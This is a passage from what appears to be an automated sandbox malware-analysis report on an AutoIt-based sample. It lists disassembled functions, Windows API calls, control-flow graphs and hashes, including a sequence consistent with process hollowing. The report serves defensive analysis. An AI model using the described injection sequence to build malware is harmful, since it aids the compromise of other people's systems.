                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
                                                                      • Opcode ID: cb06c2e29ada771c4bbcdde7ac8d9f4eecad8c0eef81a9953946f2564b50e141
                                                                      • Instruction ID: 3937417975c95bbd9ec0434c62c63d44db5579fdc9c47508e4b2e3f4a50d1f27
                                                                      • Opcode Fuzzy Hash: cb06c2e29ada771c4bbcdde7ac8d9f4eecad8c0eef81a9953946f2564b50e141
                                                                      • Instruction Fuzzy Hash: 5E71B271A05304AEC704DF65EC82FABB7E8FF99340F40492EF5458B1A1EB309A49CB52
                                                                      Function 009C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 009C2B8E
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 009C2B9D
                                                                      • LoadIconW.USER32(00000063), ref: 009C2BB3
                                                                      • LoadIconW.USER32(000000A4), ref: 009C2BC5
                                                                      • LoadIconW.USER32(000000A2), ref: 009C2BD7
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009C2BEF
                                                                      • RegisterClassExW.USER32(?), ref: 009C2C40
                                                                        • Part of subcall function 009C2CD4: GetSysColorBrush.USER32(0000000F), ref: 009C2D07
                                                                        • Part of subcall function 009C2CD4: RegisterClassExW.USER32(00000030), ref: 009C2D31
                                                                        • Part of subcall function 009C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C2D42
                                                                        • Part of subcall function 009C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 009C2D5F
                                                                        • Part of subcall function 009C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C2D6F
                                                                        • Part of subcall function 009C2CD4: LoadIconW.USER32(000000A9), ref: 009C2D85
                                                                        • Part of subcall function 009C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: bc4bb7acc0b0f08076a2d8346beff001b3d8028e513ea97d692c51245a9d24f1
                                                                      • Instruction ID: caeeffcd1ddca7914bdec013dd3f19b0c7493b051738430e9f271f9cafab4426
                                                                      • Opcode Fuzzy Hash: bc4bb7acc0b0f08076a2d8346beff001b3d8028e513ea97d692c51245a9d24f1
                                                                      • Instruction Fuzzy Hash: 05211874E00319AFDB50DFE5EC59BAA7FB4FB48B54F04411BE504AA6A0DBB10542CF90
                                                                      Function 009C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 443 9c3170-9c3185 444 9c31e5-9c31e7 443->444 445 9c3187-9c318a 443->445 444->445 448 9c31e9 444->448 446 9c318c-9c3193 445->446 447 9c31eb 445->447 449 9c3199-9c319e 446->449 450 9c3265-9c326d PostQuitMessage 446->450 452 a02dfb-a02e23 call 9c18e2 call 9de499 447->452 453 9c31f1-9c31f6 447->453 451 9c31d0-9c31d8 DefWindowProcW 448->451 455 9c31a4-9c31a8 449->455 456 a02e7c-a02e90 call a2bf30 449->456 458 9c3219-9c321b 450->458 457 9c31de-9c31e4 451->457 487 a02e28-a02e2f 452->487 459 9c321d-9c3244 SetTimer RegisterWindowMessageW 453->459 460 9c31f8-9c31fb 453->460 462 9c31ae-9c31b3 455->462 463 a02e68-a02e72 call a2c161 455->463 456->458 480 a02e96 456->480 458->457 459->458 464 9c3246-9c3251 CreatePopupMenu 459->464 466 a02d9c-a02d9f 460->466 467 9c3201-9c3214 KillTimer call 9c30f2 call 9c3c50 460->467 470 9c31b9-9c31be 462->470 471 a02e4d-a02e54 462->471 476 a02e77 463->476 464->458 473 a02da1-a02da5 466->473 474 a02dd7-a02df6 MoveWindow 466->474 467->458 478 9c31c4-9c31ca 470->478 479 9c3253-9c3263 call 9c326f 470->479 471->451 483 a02e5a-a02e63 call a20ad7 471->483 481 a02dc6-a02dd2 SetFocus 473->481 482 a02da7-a02daa 473->482 474->458 476->458 478->451 478->487 479->458 480->451 481->458 482->478 488 a02db0-a02dc1 call 9c18e2 482->488 483->451 487->451 491 a02e35-a02e48 call 9c30f2 call 9c3837 487->491 488->458 491->451
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009C316A,?,?), ref: 009C31D8
                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,009C316A,?,?), ref: 009C3204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009C3227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009C316A,?,?), ref: 009C3232
                                                                      • CreatePopupMenu.USER32 ref: 009C3246
                                                                      • PostQuitMessage.USER32(00000000), ref: 009C3267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: ac75e1c7abbd135b4e17df576c3e2be2de91debce48f18f79e7398521289b49a
                                                                      • Instruction ID: fe431e987f915b205d3ae3295ae452bb5b31e242d1e35ab0b1e4e29186f5bdc8
                                                                      • Opcode Fuzzy Hash: ac75e1c7abbd135b4e17df576c3e2be2de91debce48f18f79e7398521289b49a
                                                                      • Instruction Fuzzy Hash: ED415731B44305AFDF159BB89D0DFB93A68E749350F08C12EF5128A5A1DB648E029B63
                                                                      Function 016E21B8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 499 16e21b8-16e2266 call 16dfb88 502 16e226d-16e2293 call 16e30c8 CreateFileW 499->502 505 16e229a-16e22aa 502->505 506 16e2295 502->506 511 16e22ac 505->511 512 16e22b1-16e22cb VirtualAlloc 505->512 507 16e23e5-16e23e9 506->507 509 16e242b-16e242e 507->509 510 16e23eb-16e23ef 507->510 513 16e2431-16e2438 509->513 514 16e23fb-16e23ff 510->514 515 16e23f1-16e23f4 510->515 511->507 516 16e22cd 512->516 517 16e22d2-16e22e9 ReadFile 512->517 518 16e248d-16e24a2 513->518 519 16e243a-16e2445 513->519 520 16e240f-16e2413 514->520 521 16e2401-16e240b 514->521 515->514 516->507 526 16e22eb 517->526 527 16e22f0-16e2330 VirtualAlloc 517->527 522 16e24a4-16e24af VirtualFree 518->522 523 16e24b2-16e24ba 518->523 528 16e2449-16e2455 519->528 529 16e2447 519->529 524 16e2415-16e241f 520->524 525 16e2423 520->525 521->520 522->523 524->525 525->509 526->507 530 16e2337-16e2352 call 16e3318 527->530 531 16e2332 527->531 532 16e2469-16e2475 528->532 533 16e2457-16e2467 528->533 529->518 539 16e235d-16e2367 530->539 531->507 536 16e2477-16e2480 532->536 537 16e2482-16e2488 532->537 535 16e248b 533->535 535->513 536->535 537->535 540 16e239a-16e23ae call 16e3128 539->540 541 16e2369-16e2398 call 16e3318 539->541 547 16e23b2-16e23b6 540->547 548 16e23b0 540->548 541->539 549 16e23b8-16e23bc CloseHandle 547->549 550 16e23c2-16e23c6 547->550 548->507 549->550 551 16e23c8-16e23d3 VirtualFree 550->551 552 16e23d6-16e23df 550->552 551->552 552->502 552->507
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016E2289
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016E24AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                      • Instruction ID: 2abcea8afb3cd563065296ac6f8a6606b94bedfe151c48e61130ae4d8f0a4aea
                                                                      • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                      • Instruction Fuzzy Hash: 15A10A70E01209EBDB14CFA4C898BEEBBB6BF48305F20825DE515BB280D7759A45CF95
                                                                      Function 009C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 563 9c2c63-9c2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009C2C91
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009C2CB2
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,009C1CAD,?), ref: 009C2CC6
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,009C1CAD,?), ref: 009C2CCF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: b7ebb9e1295f56ac226fa5d3f28befc96cff2ab1765730697186208e386fe01e
                                                                      • Instruction ID: 4205bcda65233e9c7467a8dc28363b28e06f32d5dd2f9027d6208ab620615b63
                                                                      • Opcode Fuzzy Hash: b7ebb9e1295f56ac226fa5d3f28befc96cff2ab1765730697186208e386fe01e
                                                                      • Instruction Fuzzy Hash: 00F030796403917EE77087636C0CE772E7DE7CAF61B00005AF9049A560DA710842DA70
                                                                      Function 016E1F38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 678 16e1f38-16e20ba call 16dfb88 call 16e1e28 CreateFileW 685 16e20bc 678->685 686 16e20c1-16e20d1 678->686 687 16e2171-16e2176 685->687 689 16e20d8-16e20f2 VirtualAlloc 686->689 690 16e20d3 686->690 691 16e20f6-16e210d ReadFile 689->691 692 16e20f4 689->692 690->687 693 16e210f 691->693 694 16e2111-16e214b call 16e1e68 call 16e0e28 691->694 692->687 693->687 699 16e214d-16e2162 call 16e1eb8 694->699 700 16e2167-16e216f ExitProcess 694->700 699->700 700->687
                                                                      APIs
                                                                        • Part of subcall function 016E1E28: Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016E20AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: VJV7XQ9EQRFV353E2OBBFEWJN2OR
                                                                      • API String ID: 2694422964-3421154003
                                                                      • Opcode ID: a9f295cf980038b5d9f069129b512694261fae3db3986f439e7566c0bbe00b01
                                                                      • Instruction ID: b9a77bcef6c3b636887f4104e6da86c61f033c512a1ea7804a61705e004351a3
                                                                      • Opcode Fuzzy Hash: a9f295cf980038b5d9f069129b512694261fae3db3986f439e7566c0bbe00b01
                                                                      • Instruction Fuzzy Hash: 57716330D04289DAEF11DBA4C8587DEBBB9AF15304F044199E6487B2C1D7BA4B45CBA6
                                                                      Function 00A32947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32C05
                                                                      • DeleteFileW.KERNEL32(?), ref: 00A32C87
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A32C9D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32CAE
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A32CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: f7142e1088d880a1140e0dad7cd920fae6abc7f5cdc91c978a94ff8096cf69c6
                                                                      • Instruction ID: 36a4b653dfc39104a37f38f60dc55fd378e32ee4bd3c6d051a80bca6c410f565
                                                                      • Opcode Fuzzy Hash: f7142e1088d880a1140e0dad7cd920fae6abc7f5cdc91c978a94ff8096cf69c6
                                                                      • Instruction Fuzzy Hash: 52B13D72D01219ABDF11EFA5CD85FDEB7BDEF48350F1040A6F609E6151EA30AE448B61
                                                                      Function 009C3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 844 9c3b1c-9c3b27 845 9c3b99-9c3b9b 844->845 846 9c3b29-9c3b2e 844->846 847 9c3b8c-9c3b8f 845->847 846->845 848 9c3b30-9c3b48 RegOpenKeyExW 846->848 848->845 849 9c3b4a-9c3b69 RegQueryValueExW 848->849 850 9c3b6b-9c3b76 849->850 851 9c3b80-9c3b8b RegCloseKey 849->851 852 9c3b78-9c3b7a 850->852 853 9c3b90-9c3b97 850->853 851->847 854 9c3b7e 852->854 853->854 854->851
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B40
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B61
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,009C3B0F,SwapMouseButtons,00000004,?), ref: 009C3B83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 8a8bbd11ad7162330bbcfb3443677db4000455e3f46034f9cc8a57e1ec6e6317
                                                                      • Instruction ID: 7f09e8edf4a8ae40774efe0cc17b512861e79363942806c819e001347f767d6d
                                                                      • Opcode Fuzzy Hash: 8a8bbd11ad7162330bbcfb3443677db4000455e3f46034f9cc8a57e1ec6e6317
                                                                      • Instruction Fuzzy Hash: D51118B5910208FFDB20CFA5DC44EBEB7BCEF04755B10C959B805D7110E2319E419B61
                                                                      Function 016E0E28 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 855 16e0e28-16e0ec8 call 16e32f8 * 3 862 16e0edf 855->862 863 16e0eca-16e0ed4 855->863 865 16e0ee6-16e0eef 862->865 863->862 864 16e0ed6-16e0edd 863->864 864->865 866 16e0ef6-16e15a8 865->866 867 16e15aa-16e15ae 866->867 868 16e15bb-16e15e8 CreateProcessW 866->868 869 16e15f4-16e1621 867->869 870 16e15b0-16e15b4 867->870 875 16e15ea-16e15ed 868->875 876 16e15f2 868->876 886 16e162b 869->886 887 16e1623-16e1626 869->887 871 16e162d-16e165a 870->871 872 16e15b6 870->872 874 16e1664-16e167e Wow64GetThreadContext 871->874 896 16e165c-16e165f 871->896 872->874 879 16e1685-16e16a0 ReadProcessMemory 874->879 880 16e1680 874->880 881 16e19e9-16e19eb 875->881 876->874 884 16e16a7-16e16b0 879->884 885 16e16a2 879->885 883 16e1992-16e1996 880->883 888 16e1998-16e199c 883->888 889 16e19e7 883->889 891 16e16d9-16e16f8 call 16e2978 884->891 892 16e16b2-16e16c1 884->892 885->883 886->874 887->881 893 16e199e-16e19aa 888->893 894 16e19b1-16e19b5 888->894 889->881 904 16e16ff-16e1722 call 16e2ab8 891->904 905 16e16fa 891->905 892->891 897 16e16c3-16e16d2 call 16e28c8 892->897 893->894 900 16e19b7-16e19ba 894->900 901 16e19c1-16e19c5 894->901 896->881 897->891 908 16e16d4 897->908 900->901 906 16e19c7-16e19ca 901->906 907 16e19d1-16e19d5 901->907 914 16e176c-16e178d call 16e2ab8 904->914 915 16e1724-16e172b 904->915 905->883 906->907 910 16e19d7-16e19dd call 16e28c8 907->910 911 16e19e2-16e19e5 907->911 908->883 910->911 911->881 921 16e178f 914->921 922 16e1794-16e17b2 call 16e3318 914->922 917 16e172d-16e175e call 16e2ab8 915->917 918 16e1767 915->918 925 16e1765 917->925 926 16e1760 917->926 918->883 921->883 928 16e17bd-16e17c7 922->928 925->914 926->883 929 16e17fd-16e1801 928->929 930 16e17c9-16e17fb call 16e3318 928->930 932 16e18ec-16e1909 call 16e24c8 929->932 933 16e1807-16e1817 929->933 930->928 941 16e190b 932->941 942 16e1910-16e192f Wow64SetThreadContext 932->942 933->932 936 16e181d-16e182d 933->936 936->932 937 16e1833-16e1857 936->937 940 16e185a-16e185e 937->940 940->932 943 16e1864-16e1879 940->943 941->883 944 16e1933-16e193e call 16e27f8 942->944 945 16e1931 942->945 947 16e188d-16e1891 943->947 951 16e1942-16e1946 944->951 952 16e1940 944->952 945->883 949 16e18cf-16e18e7 947->949 950 16e1893-16e189f 947->950 949->940 953 16e18cd 950->953 954 16e18a1-16e18cb 950->954 955 16e1948-16e194b 951->955 956 16e1952-16e1956 951->956 952->883 953->947 954->953 955->956 958 16e1958-16e195b 956->958 959 16e1962-16e1966 956->959 958->959 960 16e1968-16e196b 959->960 961 16e1972-16e1976 959->961 960->961 962 16e1978-16e197e call 16e28c8 961->962 963 16e1983-16e198c 961->963 962->963 963->866 963->883
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                      • Instruction ID: da0accb374c268dd6355fa530f3f9c613ba63b4d9927d14e9eb6e14467a20c37
                                                                      • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                                                                      • Instruction Fuzzy Hash: D762FA30A152189BEB24DBA4CC54BEEB776FF58300F1091A9D10DEB390E7759E81CB59
                                                                      Function 009CDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00A132B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: ad09644f85639b30377ca9d0439996a66a52e9a181458e133670b446150b8c75
                                                                      • Instruction ID: 7d3e22112da04de7bfd9211ec53615c2d92cd360715034017d2caf42183119c0
                                                                      • Opcode Fuzzy Hash: ad09644f85639b30377ca9d0439996a66a52e9a181458e133670b446150b8c75
                                                                      • Instruction Fuzzy Hash: 12C27771E00205DFCB24CF98C881FADB7B5BF48310F24856AE916AB391D775AD81CB92
                                                                      Function 009C3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A033A2
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C3A04
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      • Opcode ID: 3d2531fea46dce65e3649fb10da88832823f3aef364fd4aada2771bdaa663940
                                                                      • Instruction ID: 27333771386d2bc410d8f6d40a991f6bef282e351eac3c12073b3dff2627b4f2
                                                                      • Opcode Fuzzy Hash: 3d2531fea46dce65e3649fb10da88832823f3aef364fd4aada2771bdaa663940
                                                                      • Instruction Fuzzy Hash: 4731C071908305AAD721EB60DC46FEBB7ECAB80714F00892EF59997191DF749A49C7C3
                                                                      Function 009DFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009E0668
                                                                        • Part of subcall function 009E32A4: RaiseException.KERNEL32(?,?,?,009E068A,?,00A91444,?,?,?,?,?,?,009E068A,009C1129,00A88738,009C1129), ref: 009E3304
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009E0685
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
